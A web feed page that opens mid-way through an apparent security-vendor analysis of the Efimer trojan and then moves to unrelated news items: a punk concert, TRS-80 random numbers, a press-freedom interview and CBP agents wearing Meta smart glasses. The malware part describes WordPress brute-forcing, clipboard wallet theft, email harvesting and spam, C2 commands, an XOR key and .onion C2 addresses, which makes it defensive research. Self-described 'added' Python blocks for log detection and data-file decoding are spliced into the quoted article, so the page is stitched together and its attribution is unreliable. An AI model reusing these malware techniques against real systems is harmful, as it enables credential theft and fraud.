Meanwhile, multiple processes are running concurrently on the victim’s computer, all performing brute-force operations. As mentioned before, when the script is launched with the “B” argument, it enters an infinite brute-forcing loop, with each process independently handling its targets. At the start of each iteration, there’s a randomly chosen 1–2 second pause. This delay helps stagger the start times of requests, making the activity harder to detect. Following this, the process retrieves a random object file ID for processing from C:\Users\Public\Controller\objects by calling ObjGetW.

The ObjGetW function snags a random domain object that’s not currently tied up by a brute-force process. Locked files are marked with the LOCK extension. Once a free, random domain is picked for brute-forcing, the lockObj function is called. This changes the file’s extension to LOCK so other processes don’t try to work on it. If all objects are locked, or if the chosen object can’t be locked, the script moves to the next loop iteration and tries again until it finds an available file. If a file is successfully acquired for processing, the script extracts data from it, including the domain, password brute-force counters, and a list of users.

Based on these counter values, the script checks if all combinations have been exhausted or if the maximum number of failed attempts has been exceeded. If the attempts are exhausted, the object is deleted, and the process moves on to a new iteration. If attempts remain, the script tries to authenticate with the help of hardcoded passwords.

When attempting to guess a password for each user, a web page post request is sent via the WPTryPost function. Depending on the outcome of the brute-force attempt, ObjUpd is called to update the status for the current domain and the specific username-password combination.

After the status is updated, the object is unlocked, and the process pauses randomly before continuing the cycle with a new target. This ensures continuous, multi-threaded credential brute-forcing, which is also regulated by the script and logged in a special file. This logging prevents the script from starting over from scratch if it crashes.

Successfully guessed passwords are sent to the C2 with the GOOD command.
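From the website administrator's side, the WPTryPost and WPGetUsers behaviour described above leaves a recognisable trace in the web server's access log. The following is an added example, not code from the original article: it flags clients that POST to the WordPress XML-RPC endpoint and then request /wp-json/wp/v2/users, counts their XML-RPC POSTs, and checks post titles for the test string quoted in the request above. It assumes Combined Log Format, the standard /xmlrpc.php endpoint path, a 60-second correlation window and a threshold of five POSTs; the log lines use documentation IP ranges and are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

MARKER = "0x1c8c5b6a"  # title/description string of the test post quoted in the article

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)


def parse(line):
    """Return (ip, timestamp, kind, status) for relevant requests, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m["path"].split("?", 1)[0].rstrip("/").lower()
    if m["method"] == "POST" and path.endswith("/xmlrpc.php"):
        kind = "xmlrpc"
    elif m["method"] == "GET" and path.endswith("/wp-json/wp/v2/users"):
        kind = "users"
    else:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, kind, int(m["status"])


def detect(lines, window=timedelta(seconds=60), brute_threshold=5):
    """Flag clients showing the probe-then-enumerate sequence or repeated XML-RPC POSTs."""
    seen = defaultdict(lambda: {"xmlrpc": [], "users": [], "users_ok": False})
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        ip, ts, kind, status = ev
        seen[ip][kind].append(ts)
        if kind == "users" and status == 200:
            seen[ip]["users_ok"] = True  # the user list was actually served

    findings = {}
    for ip, s in seen.items():
        # The users request must come after an XML-RPC POST, within the window.
        probe = any(
            timedelta(0) <= u - x <= window for x in s["xmlrpc"] for u in s["users"]
        )
        posts = len(s["xmlrpc"])
        if probe or posts >= brute_threshold:
            findings[ip] = {
                "probe_then_enum": probe,
                "xmlrpc_posts": posts,
                "users_listed": s["users_ok"],
            }
    return findings


def marker_posts(posts):
    """posts: iterable of (post_id, title). A hit means a test post was created."""
    return [pid for pid, title in posts if MARKER in title]


# Constructed access-log sample (documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [08/Aug/2025:10:00:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "-"
203.0.113.7 - - [08/Aug/2025:10:00:02 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 1874 "-" "-"
198.51.100.20 - - [08/Aug/2025:10:00:05 +0000] "GET /wp-json/wp/v2/users?per_page=5 HTTP/1.1" 200 1874 "-" "Mozilla/5.0"
192.0.2.44 - - [08/Aug/2025:10:01:10 +0000] "POST /xmlrpc.php HTTP/1.1" 200 512 "-" "WordPress/6.5"
203.0.113.7 - - [08/Aug/2025:10:03:11 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "-"
203.0.113.7 - - [08/Aug/2025:10:03:13 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "-"
203.0.113.7 - - [08/Aug/2025:10:03:14 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "-"
203.0.113.7 - - [08/Aug/2025:10:03:16 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "-"
203.0.113.7 - - [08/Aug/2025:10:03:17 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "-"
203.0.113.7 - - [08/Aug/2025:10:03:19 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "-"
198.51.100.20 - - [08/Aug/2025:10:04:00 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for ip, info in detect(SAMPLE_LOG).items():
        print(ip, info)
```

If "users_listed" is true for a flagged client, the REST user listing is readable without authentication and is worth restricting, alongside XML-RPC if the site does not need it.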

Alternative Efimer version


We also discovered another script named “assembly.js” (MD5: 100620a913f0e0a538b115dbace78589). While similar in functionality to controller.js and ntdlg.js, it has several significant differences.

Similarly to the first script, this one belongs to the ClipBanker type. Just like its predecessors, this malware variant reads a unique user ID. This time it looks for the ID at C:\Users\Public\assembly\GUID. If it can’t find or read that ID, it generates a new one. This new ID follows the format M11-XXXX-YYYY, where XXXX and YYYY are random four-digit hexadecimal numbers. Next up, the script checks if it’s running inside a virtual machine environment.

If it detects a VM, it prefixes the GUID string with a “V”; otherwise, it uses an “R”. Following this, the directory where the GUID is stored (which appears to be the script’s main working directory) is hidden.

After that, a file named “lptime” is saved to the same directory. This file stores the current time, minus 21,000 seconds. Once these initial setup steps are complete, the malware enters its main operation loop. The first thing it does is check the time stored in the “lptime” file. If the difference between the current time and the time in the file is greater than 21,600 seconds, it starts preparing data to send to the server.

After that, the script attempts to read data from a file named “geip”, which it expects to find at C:\Users\Public\assembly\geip. This file contains information about the infected device’s country and IP address. If it’s missing, the script retrieves information from ipinfo.io/json and saves it. Next, it activates the Tor service, located at C:\Users\Public\assembly\upsvc.exe.

Afterwards, the script uses the function GetWalletsList to locate cryptocurrency wallets and compile a list of its findings.

It prioritizes scanning of browser extension directories for Google Chrome and Brave, as well as folders for specific cryptocurrency wallet applications whose paths are hardcoded within the script.

The script then reads a file named “data” from C:\Users\Public\assembly. This file typically contains the results of previous searches for mnemonic phrases in the clipboard. Finally, the script sends the data from this file, along with the cryptocurrency wallets it discovered from application folders, to a C2 server at:
http://he5vnov645txpcv57el2theky2elesn24ebvgwfoewlpftksxp4fnxad[.]onion/assembly/route.php
After the script sends the data, it verifies the server’s response with the help of the CheckOnionCMD function, which is similar to the functions found in the other scripts. The server’s response can contain one of the following commands:

  • RPLY returns “OK”. This response is only received after cryptocurrency wallets are sent, and indicates that the server has successfully received the data. If the server returns “OK”, the old data file is deleted. However, if the transmission fails (no response is received), the file isn’t deleted. This ensures that if the C2 server is temporarily unavailable, the accumulated wallets can still be sent once communication is re-established.
  • EVAL executes a JavaScript script provided in the response.
  • KILL completely removes all of the malware’s components and terminates its operation.

Next, the script scans the clipboard for strings that resemble mnemonic phrases and cryptocurrency wallet addresses.

Any discovered data is then XOR-encrypted using the key $@#LcWQX3$ and saved to a file named “data”. After these steps, the entire cycle repeats.
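During incident response, the “data” file tells the responder what the clipboard monitor captured before it was sent. The following is an added example, not code from the original article or from the malware: it decodes a recovered “data” file with the key quoted above and reports which address types and how many mnemonic-like phrases it holds, without printing the phrases themselves. It assumes a byte-wise repeating-key XOR over ASCII text, which the article does not specify; the sample file content is constructed.

```python
import re
from itertools import cycle

KEY = b"$@#LcWQX3$"  # XOR key quoted in the article

ADDRESS_RES = {
    # Bitcoin: Base58 legacy/P2SH or bech32 (bc1...) addresses.
    "btc": re.compile(
        r"\b(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[ac-hj-np-z02-9]{11,71})\b"
    ),
    # Ethereum: 0x followed by 40 hex characters.
    "eth": re.compile(r"\b0x[a-fA-F0-9]{40}\b"),
}
# BIP-39 phrases are 12, 15, 18, 21 or 24 lowercase words of 3 to 8 letters.
MNEMONIC_RE = re.compile(r"\b(?:[a-z]{3,8} ){11,23}[a-z]{3,8}\b")
VALID_COUNTS = {12, 15, 18, 21, 24}


def xor_bytes(data, key=KEY):
    """Repeating-key XOR (assumed scheme); the same call encodes and decodes."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def printable_ratio(data):
    """Share of bytes that are printable ASCII, tab, CR or LF."""
    if not data:
        return 0.0
    ok = sum(1 for b in data if 0x20 <= b <= 0x7E or b in (9, 10, 13))
    return ok / len(data)


def triage(blob, key=KEY, min_ratio=0.9):
    """Decode a recovered file and summarise what it exposes."""
    plain = xor_bytes(blob, key)
    if printable_ratio(plain) < min_ratio:
        # Wrong key, different scheme, or not an Efimer data file.
        return {"decoded": False, "mnemonic_word_counts": [], "addresses": {}}
    text = plain.decode("ascii", errors="replace")
    counts = [len(m.group().split()) for m in MNEMONIC_RE.finditer(text)]
    return {
        "decoded": True,
        # Report only the length of each phrase: the words are still secrets.
        "mnemonic_word_counts": [c for c in counts if c in VALID_COUNTS],
        "addresses": {
            kind: sorted(set(rx.findall(text))) for kind, rx in ADDRESS_RES.items()
        },
    }


# Constructed sample: a made-up 12-word phrase and a made-up Ethereum-style address.
SAMPLE_PLAIN = (
    b"apple banana cherry delta eagle forest garden harbor island jungle kitten lemon\n"
    + b"0x" + b"ab" * 20 + b"\n"
)
SAMPLE_DATA_FILE = xor_bytes(SAMPLE_PLAIN)

if __name__ == "__main__":
    print(triage(SAMPLE_DATA_FILE))
```

Any wallet whose phrase or address shows up in the summary should be treated as exposed, since the article notes the file is only deleted after the server confirms receipt.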

“Liame” email address harvesting script


This script operates as another spy, much like the others we’ve discussed, and shares many similarities. However, its purpose is entirely different. Its primary goal is to collect email addresses from specified websites and send them to the C2 server. The script receives the list of target websites as a command from the C2. Let’s break down its functionality in more detail.

At startup, the script first checks for the presence of the LUID (unique identifier for the current system) in the main working directory, located at C:\Users\Public\Controller\LUID. If the LUID cannot be found, it creates one via a function similar to those seen in other scripts. In this case, the unique identifier takes the format fl01-<4 random hex characters>.

Next, the checkUpdate() function runs. This function checks for a file at C:\Users\Public\Controller\update_l.flag. If the file exists, the script waits for 30 seconds, then deletes update_l.flag, and terminates its operation.

Afterwards, the script periodically (every 10 minutes) sends a request to the server to receive commands. It uses a function named PingToOnion, which is similar to the identically named functions in other scripts.

The request includes the following parameters:

  • LIAM: unique identifier
  • action: request type
  • data: data corresponding to the request type

In this section of the code, the LIAM string is used as the action, and the data parameter contains the number of collected email addresses along with the script operation statistics.

If the script unexpectedly terminates due to an error, it can send a log in addition to the statistics, where the action parameter will contain the LOGS string, and the data parameter will contain the error message.

The request is sent to the following C2 address:
http://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad[.]onion/route.php
The server returns a JSON-like structure, which the next function later parses.

The structure dictates the commands the script should execute.

This script supports two primary functions:

  • Get a list of email addresses from domains provided by the server

    The script receives domains and iterates through each one to find hyperlinks and email addresses on the website pages.

    The GetPageLinks function parses the HTML content of a webpage and extracts all links that reside on the same domain as the original page. This function then filters these links, retaining only those that point to HTML/PHP files or files without extensions.

    The PageGetLiame function extracts email addresses from the page’s HTML content. It can process both openly displayed addresses and those encapsulated within mailto links.

    Following this initial collection, the script revisits all previously gathered links on the C2-provided domains, continuing its hunt for additional email addresses. Finally, the script de-duplicates the entire list of harvested email addresses and saves them for future use.

  • Exfiltrate collected data to the server
    In this scenario, the script anticipates two parameters from the C2 server’s response: pstack and buffer, where:
    • pstack is an array of domains to which subsequent POST requests will be sent;
    • buffer is an array of strings, each containing data in the format of address,subject,message.

    The script randomly selects a domain from pstack and then uploads one of the strings from the buffer parameter to it. This part of the script likely functions as a spam module, designed to fill out forms on target websites. For each successful data submission via a POST request to a specific domain, the script updates its statistics (which we mentioned earlier) with the number of successful transmissions for that domain.

    If an error occurs within this loop, the script catches it and reports it back to the C2 server with the LOGS command.

Throughout the code, you’ll frequently encounter the term “Liame”, which is simply “Email” spelled backwards. Similarly, variations like “Liama”, “Liam”, and “Liams” are also present, likely derived from “Liame”. This kind of “wordplay” in the code is almost certainly an attempt to obscure the malicious intent of its functions. For example, instead of a clearly named “PageGetEmail” function, you’d find “PageGetLiame”.

Victims


From October 2024 through July 2025, Kaspersky solutions detected the Efimer Trojan impacting 5015 Kaspersky users. The malware exhibited its highest level of activity in Brazil, where attacks affected 1476 users. Other significantly impacted countries include India, Spain, Russia, Italy, and Germany.

TOP 10 countries by the number of users who encountered Efimer

Takeaways


The Efimer Trojan combines a number of serious threats. While its primary goal is to steal and swap cryptocurrency wallets, it can also leverage additional scripts to compromise WordPress sites and distribute spam. This allows it to establish a complete malicious infrastructure and spread to new devices.

Another interesting characteristic of this Trojan is its attempt to propagate among both individual users and corporate environments. In the first case, attackers use torrent files as bait, allegedly to download popular movies; in the other, they send claims about the alleged unauthorized use of words or phrases registered by another company.

It’s important to note that in both scenarios, infection is only possible if the user downloads and launches the malicious file themselves. To protect against these types of threats, we urge users to avoid downloading torrent files from unknown or questionable sources, always verify email senders, and consistently update their antivirus databases.

For website developers and administrators, it’s crucial to implement measures to secure their resources against compromise and malware distribution. This includes regularly updating software, using strong (non-default) passwords and two-factor authentication, and continuously monitoring their sites for signs of a breach.

Indicators of compromise



Hashes of clean files involved in the attack
5d132fb6ec6fac12f01687f2c0375353 — ntdlg.exe (Tor)

Websites
hxxps://lovetahq[.]com/sinners-2025-torent-file/
hxxps://lovetahq[.]com/wp-content/uploads/2025/04/movie_39055_xmpg.zip

C2 URLs
hxxp://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad[.]onion
hxxp://he5vnov645txpcv57el2theky2elesn24ebvgwfoewlpftksxp4fnxad[.]onion


securelist.com/efimer-trojan/1…




The Boys with Marc Valentine in Italy in September for five concerts.
freezonemagazine.com/news/marc…
The Boys arrive in our country in September with Marc Valentine for a series of five concerts that promise to be very interesting. The Boys are one of the legends of UK punk. Born when Matt Dagerfield left the London SS and joined forces with Casino Steel, who were then joined by Honest John


Exploring the TRS-80’s Color BASIC’s Random Number Function


Although these days we get to tap into many sources of entropy to give a pretty good illusion of randomness, home computers back in the 1980s weren’t so lucky. Despite this, their random number generators were good enough for games and such, as demonstrated by the [CoCo Town] YouTube channel.

The CoCo is the nickname for the TRS-80 Color Computer, which despite its name, shares absolutely nothing with the TRS-80. Its BASIC version is called Color BASIC, which like many others was based on Microsoft BASIC, so the video’s description should be valid for many other BASIC versions as well. In the video we’re first taken through a basic summary of what the floating point format is all about, before running through an example of the algorithm used by Color BASIC for its RND function, using a test program written in Color BASIC.

As described in the video, the algorithm used appears to be a linear congruential generator, which is a pseudo-random generator that requires minimal resources from the hardware it runs on. Of course, its main disadvantage is that it will fairly rapidly begin to repeat itself, especially with a limited number of output bits. This makes it a decent choice even today for something like simple game logic where you just want to get some variation without aiming for cryptographically secure levels of randomness.

youtube.com/embed/XzXvcamBzOk?…

Thanks to [Stephen Walters] for the tip.


hackaday.com/2025/08/08/explor…



Why Trump is berating Intel over its CEO’s China dealings

The article comes from #StartMag and is reshared on the Lemmy community @Informatica (Italy e non Italy 😁)
Trump has called for the immediate resignation of Intel’s chief executive, Lip-Bu Tan, who is accused of a conflict of interest with China: the businessman has indeed invested in many Chinese companies, and Cadence Design (the company that he



Facial recognition and data analysis: civil society opposes the “security package”


netzpolitik.org/2025/gesichtse…



The leading voice for visual journalists may be silenced. You can help.


For decades, one organization has dedicated itself to protecting the rights of news photographers and videographers. The National Press Photographers Association has led countless First Amendment battles to protect visual journalists’ right to document and the public’s right to see and hear the news.

The organization’s general counsel, Mickey Osterreicher, is often at the forefront of those fights. He and NPPA have protected the First Amendment right to record in public, limited senseless government regulations restricting photography and recording, and even won a groundbreaking settlement with the New York Police Department over its treatment of journalists at protests.

But recently, NPPA announced that it faces financial difficulties. Freedom of the Press Foundation (FPF) spoke to Osterreicher about NPPA’s work and the impact on the First Amendment if it shutters. You can read our full conversation below, and you can donate to NPPA’s programs here.

You’ve been NPPA’s general counsel since 2005, and you’ve also been a news photographer. How have the legal issues facing visual journalists changed over the years, and what are the most pressing issues they face today?

Both from a practical and legal standpoint, being a journalist was a lot simpler when I was a photojournalist. One of the biggest challenges I now face is trying to answer the question from police and lawmakers, “Who is a journalist?” and, during a protest, “Who gets to stay after an order to disperse?”

But once those press access rights have been attained, what good is it if visual journalists cannot make a decent living after risking their health and safety because their images are being misappropriated without permission, credit, or compensation? So it is a combination of dealing with First Amendment and copyright issues that keeps me up most nights.

That is to say nothing of the exponential use of generative artificial intelligence that has economically impacted the market for news photography as well as creating ethical challenges for visual journalists and public perception.

Tell us more about how the rise of AI-generated images and deepfakes is affecting the work and rights of visual journalists.

For visual journalism, generative artificial intelligence is the worst of both worlds, where millions of images (still and video) are ingested to train AI models without payment to the creators and the public can no longer believe what they see without wondering if what they are viewing is a true depiction of what really happened or an artificially created image. Even worse, this technology now provides an additional layer of ambiguity to those who claim that actual images of real events are “fake news.”

You’ve trained many law enforcement officers about journalists’ First Amendment rights, especially when they’re covering political conventions and protests. What are the most important things for police officers to know about press freedom, and how is NPPA uniquely positioned to provide that training?

I have three goals when training police and journalists about press freedoms. One: that police are not sued for abridging First Amendment rights of citizens and journalists, costing taxpayers dearly with money that could be better spent for police recruitment and retention or equipment. Two: that journalists are able to do their jobs without being harassed, injured, or arrested. Three: that the public is informed, which is the basis for the First Amendment — that being the desire by the founding fathers for the right of the public to receive information, and be an informed electorate.

As “the voice of visual journalists” since 1946, NPPA is uniquely positioned to foster improved police-press-public relations in an era when it is most needed by instilling greater respect for the roles each plays in our democracy. We’ve provided these trainings to law enforcement agencies nationwide for almost 20 years, with scores of departments and hundreds of officers being trained, including the entire Minnesota State Patrol as part of the settlement terms of a federal civil rights lawsuit, as well as the start of training with the NYPD regarding the new policies and procedures implemented as a result of the settlement of our lawsuit.

What I believe also adds to NPPA’s credibility is my background as a photojournalist with over forty years’ experience in print and broadcast, my experience as a First Amendment attorney, and my understanding of the challenges facing law enforcement from having been a uniformed reserve deputy sheriff with the Erie County Sheriff’s Office since 1976 and working closely with law enforcement through various associations and committees.

That experience working with police departments — which not many press freedom organizations have — has also allowed you to get involved in many other issues that are important to all journalists, not just visual ones. Tell us about your work on police radio encryption and other ways you’re able to leverage the work you’ve done training police departments.

The encryption of police radio transmissions is a growing problem nationwide, because for almost a century, newsrooms and journalists have relied on the monitoring of those broadcasts to cover breaking news and other matters of public concern.

One place where such coverage is critical is New York City, where so many newsworthy events occur and where, because of the congested vehicle traffic, time is of the essence in getting to the scene. A few years ago, the NYPD announced that it would begin encrypting its transmissions. NPPA joined a consortium of news organizations asking to work with NYPD to allow journalists to continue to have real-time access to those broadcasts. Despite meeting with police officials, testifying before the city council and submitting a white paper on the subject, the NYPD has refused to discuss this issue further, and many of the important police frequencies have already been encrypted.

The consortium then supported a state bill that would allow for press access. That bill passed both houses and is awaiting the governor’s signature. NPPA has also worked with press groups around the country to address this issue.

Another problem we helped to solve was an exemption for journalists to a New York law that banned anyone in the state (except for certain “eligible professions”) from the “purchase, taking possession of, sale, exchange, giving or disposing of body armor.”

Additionally, NPPA was instrumental in opposing an Arizona bill that barred anyone recording police from getting closer than 15 feet to an officer without their permission. I drafted several letters to the legislature joined by 30 press organizations cautioning against the unconstitutionality of the proposed law, which was ultimately passed after the measure was amended to an 8-foot distance. I then worked with the American Civil Liberties Union and Arizona Broadcasters Association to obtain a permanent injunction prohibiting enforcement of the law. NPPA has also filed amicus briefs in two other constitutional challenges to similar laws in Indiana and Louisiana.

When the White House restricted the Associated Press’s access over its use of the term ‘Gulf of Mexico’ (a move that NPPA and FPF condemned), it raised concerns about the chilling effects of such retaliation on journalists. If presidents can exclude outlets or photographers from the press pool for editorial decisions, what does that mean for press freedom and the role of visual journalists?

As NPPA stated, such actions by the administration are unacceptable as both an attempt at prior restraint and a blatant retaliation and chilling abridgment of the First Amendment rights of the AP and its journalists.

Unfortunately, we have seen both the federal district court as well as the circuit court hearing the appeal in this case give wide latitude and discretion to the White House as to who it admits to cover certain events. Additional fallout from this has been the White House Correspondents Association losing its long-standing control over the press pool rotation as well as other “disfavored” media outlets being barred from inclusion in the pool.

All these actions taken by the administration are having a chilling effect on press coverage of the government and are eviscerating press freedom. The NPPA continues to work with news and press freedom organizations to advocate and support the right of the public to be informed.

Over the years, NPPA has had to oppose a number of laws that prohibit or limit taking pictures in public places as well as using drones to capture aerial footage. What should journalists do if they’re stopped and told they can’t take pictures or record in public?

Our staunch advocacy has led to the right to photograph and record in traditional public forums being “clearly established” in three-quarters of the U.S. Circuit Courts of Appeal, which is key to successfully bringing civil rights claims against those who try to limit or interfere with those rights.

While NPPA was initially successful in challenging Texas drone regulations, that decision was reversed on appeal. But we have been effective in ensuring that language protecting the First Amendment rights of journalists to use drones for newsgathering be included in government regulations.

NPPA has provided extensive training as to what journalists can do if they’re stopped and told they can’t take pictures or record in public. The foremost advice is to meet with law enforcement on a regular basis to ensure that these rights are honored by police and to discuss how best to improve police-press interactions. While in the field, it is crucial to maintain situational awareness and pay attention to police and crowd movements to avoid being encircled (kettled). Always have an exit strategy, as it is always better to move to a different location than be arrested. If police stop or question you about your activities, make sure to identify yourself as a journalist.

What will journalism lose if NPPA is forced to close its doors?

It would be a significant loss to not only visual journalists but to journalism itself if NPPA were to cease as an organization. For almost 80 years, NPPA has strongly advocated for the rights of visual journalists and now more than ever that unique voice is needed as more journalists are required to report not only with words but images. It also comes at a time when the importance of truthful images could not be greater.

While there are many other organizations supporting the First Amendment and press freedoms, none is more exclusively dedicated to the advancement and protection of visual journalism in its role as a vital public service than the NPPA. Our code of ethics is often cited as exemplary of what visual journalism should strive to achieve. Should our voice be muted, its silence will be deafening.

Donate to NPPA’s programs here to help protect the rights of visual journalists and the public’s right to know.


freedom.press/issues/the-leadi…



Federico Orlando: the liberal who defended freedom against every form of censorship


@Giornalismo e disordine informativo
articolo21.org/2025/08/federic…
Eleven years ago, on 8 August 2014, Federico Orlando, founder and first president of Articolo 21, left us. “Federico, how does it feel to march among all these red flags?” we asked him on the occasion of the first




Video obtained and verified by 404 Media shows a CBP official wearing Meta's AI glasses, which are capable of recording and connecting with AI. “I think it should be seen in the context of an agency that is really encouraging its agents to actively intimidate and terrorize people," one expert said.#CBP #Immigration #Meta


A CBP Agent Wore Meta Smart Glasses to an Immigration Raid in Los Angeles


A Customs and Border Protection (CBP) agent wore Meta’s AI smart glasses to a June 30 immigration raid outside a Home Depot in Cypress Park, Los Angeles, according to photos and videos of the agent verified by 404 Media.

Meta does not have a contract with CBP, and 404 Media was unable to confirm whether or not the agent recorded any video using the smart glasses at the raid. Based on what we know so far, this appears to be a one-off case of an agent either wearing his personal device to an immigration raid, or CBP trying technology on an ad-hoc basis without a formal procurement process. Civil liberties and privacy experts told 404 Media, however, that even on a one-off basis, it signals that law enforcement agents are interested in smart glasses technology and that the wearing of smart glasses in an immigration raid context is highly concerning.

“There’s a nonzero chance the agent bought the Meta smart glasses because they wanted it for themselves and it’s the glasses they like to wear. But even if that’s the case, it’s worth pointing out that there are regulatory things that need to be thought through, and this stuff can trickle down to officers on an individual basis,” Jake Laperruque, deputy director of the Center for Democracy and Technology’s security and surveillance project, told 404 Media. “There needs to be compliance with rules and laws even if a technology is not handed out through the department. The questions around [smart glasses are ones] we’re going to have to grapple with very soon and they’re pretty alarming.”

The glasses were worn by a CBP agent outside of a Home Depot in Cypress Park, Los Angeles during a June 30 immigration raid which happened amid weeks of protests, the deployment of the National Guard and the Marines, and during which immigration enforcement in Los Angeles has become a flashpoint in the Trump administration’s mass deportation campaign and the backlash to it. 404 Media obtained multiple photos and videos of the CBP agent wearing the Meta glasses and verified that the footage and videos were taken outside of the Cypress Park Home Depot during an immigration raid. The agent in the photo is wearing Meta’s Ray Ban AI glasses, a mask, and a CBP uniform and patch. CBP did not respond to multiple requests for comment.


In the video, a CBP agent motions to the person filming the video to back up. The Meta Ray Ban AI glasses are clearly visible on the agent’s face.

Meta’s AI smart glasses currently feature a camera, live-streaming capabilities, integration with Meta’s AI assistant, three microphones, and image and scene recognition capabilities through Meta AI. The Information reported that Meta is considering adding facial recognition capabilities to the device, though they do not currently have that functionality. When filming, a recording light on Meta’s smart glasses turns on; in the photos and brief video 404 Media has seen, the light is not on.

Students at Harvard University showed that they can be used in conjunction with off-the-shelf facial recognition tools to identify people in near real time.

💡
Do you know anything else about this? I would love to hear from you. Using a non-work device, you can message me securely on Signal at jason.404. Otherwise, send me an email at jason@404media.co.

Multiple experts 404 Media spoke to said that these smart glasses qualify as a body worn camera under the Department of Homeland Security’s and Customs and Border Protection’s video recording policies. CBP’s policy states that “no personally owned devices may be used in lieu of IDVRS [Incident Driven Video Recording Systems] to record law enforcement encounters,” and that “recorded data shall not be downloaded or recorded for personal use or posted onto a personally owned device.” DHS’s policy states “the use of personally owned [Body Worn Cameras] or other video, audio, or digital recording devices to record official law enforcement activities is prohibited.”

Under the Trump administration, however, enforcement of regulations for law enforcement engaging in immigration raids is largely out the window.

“I think it should be seen in the context of an agency that is really encouraging its agents to actively intimidate and terrorize people. Use of cameras can be seen as part of that,” Jay Stanley, a senior policy analyst at the ACLU, told 404 Media. “It’s in line with the masking that we’ve seen, and generally behavior that’s intended to terrorize people, masking failure to identify themselves, failure to wear clear uniforms, smashing windows, etc. A big part of why this is problematic is the utter lack of policy oversight here. If an agent videotapes themselves engaging in abusive activity, are they going to be able to bury that video? Are they going to be able to turn it on and off on the fly or edit it later? There are all kinds of abuses that can happen with these without regulation and enforcement of those regulations, and the prospects of that happening in this administration seem dim.”
When reached for comment, a Meta spokesperson asked 404 Media a series of questions about the framing of the article, and stressed that Meta does not have any contract with CBP. They then asked why Meta would be mentioned in the article at all: “I’m curious if you can explain why it is Meta will be mentioned by name in this piece when in previous 404 reporting regarding ICE facial recognition app and follow up reporting the term ‘smartphones’ or ‘phone’ is used despite ICE agents clearly using Apple iPhones and Android devices,” they said. Meta ultimately declined to comment for this story.

Meta also recently signed a partnership deal with defense contractor Anduril to offer AI, augmented reality, and virtual reality capabilities to the military through Meta’s Reality Labs division, which also makes the Meta smart glasses (though it is unclear what form this technology will take or what its capabilities will be). Earlier this year, Meta relaxed its content moderation policies on hate speech regarding the dehumanization of immigrants, and last month Meta’s CTO Andrew Bosworth was named an Army Reserve Lt. Colonel by the Trump administration.

“Meta has spent the last decade building AI and AR to enable the computing platform of the future,” Meta CEO Mark Zuckerberg said in a press release announcing the deal with Anduril. “We’re proud to partner with Anduril to help bring these technologies to the American servicemembers that protect our interests at home and abroad.”

“My mission has long been to turn warfighters into technomancers, and the products we are building with Meta do just that,” Anduril founder Palmer Luckey said in the press release.

In a recent earnings call, Zuckerberg said he believes smart glasses will become the primary way people interact with AI. “I think in the future, if you don’t have glasses that have AI or some way to interact with AI, I think you’re kind of similarly, probably [will] be at a pretty significant cognitive disadvantage compared to other people and who you’re working with, or competing against,” he said during the call. “That’s also going to unlock a lot of value where you can just interact with an AI system throughout the day in this multimodal way. It can see the content around you, it can generate a UI for you, show you information and be helpful.”

Immigrations and Customs Enforcement has recently gained access to a new facial recognition smartphone app called Mobile Fortify that is connected to several massive government databases, showing that DHS is interested in facial recognition tech.

Privacy and civil liberties experts told 404 Media that this broader context—with Meta heavily marketing its smart glasses while simultaneously getting into military contracting, and the Department of Homeland Security increasingly interested in facial recognition—means that seeing a CBP agent wearing Meta AI glasses in the field is alarming.

“Regardless of whether this was a personal choice by this agent or whether somehow CBP facilitated the use of these Meta glasses, the fact that it was worn by this agent is disturbing,” Jeramie Scott, senior counsel and director of the Electronic Information Privacy Center, told 404 Media. “Having this type of technology on a law enforcement agent starts heading toward the tactics of authoritarian governments who love to use facial recognition to try to suppress opposition.”

The fact is that Meta is at the forefront of popularizing smart glasses, which are not yet a widely adopted technology. The privacy practices and functionality of the glasses are, at the moment, largely being guided by Meta, whereas smartphones are a largely commodified technology at this point. And it’s clear that this consumer technology that the company markets on billboards as a cool way to record videos for Instagram is seen by some in law enforcement as enticing.

“It’s clear that whatever imaginary boundary there was between consumer surveillance tech and government surveillance tech is now completely erased,” Chris Gilliard, co-director of The Critical Internet Studies Institute and author of the forthcoming book Luxury Surveillance, told 404 Media.

“The fact is when you bring powerful new surveillance capabilities into the marketplace, they can be used for a range of purposes including abusive ones. And that needs to be thought through before you bring things like that into the marketplace,” the ACLU’s Stanley said.

Laperruque, of the CDT, said perhaps we should think about Meta smart glasses in the same way we think about other body cameras: “On the one hand, there’s a big difference between glasses with a computer built into them and a pair of Oakleys,” he said. “They’re not the only ones who make cameras you attach to your body. On the other hand, if that’s going to be the comparison, then let’s talk about this in the context of companies like Axon and other body-worn cameras.”

Update: After this article was published, the independent journalist Mel Buer (who runs the site Words About Work) reposted images she took at a July 7 immigration enforcement raid at MacArthur Park in Los Angeles. In Buer's footage and photos, two additional CBP agents can be seen wearing Meta smart glasses in the back of a truck; a third is holding a camera pointed out of the back of the truck. Buer gave 404 Media permission to republish the photos; you can find her work here.



Images: Mel Buer




Israel wants to liberate Gaza... the Russians want to liberate Ukraine too. You can see the love for the local populations to be liberated in both cases. It really shines through.

in reply to simona

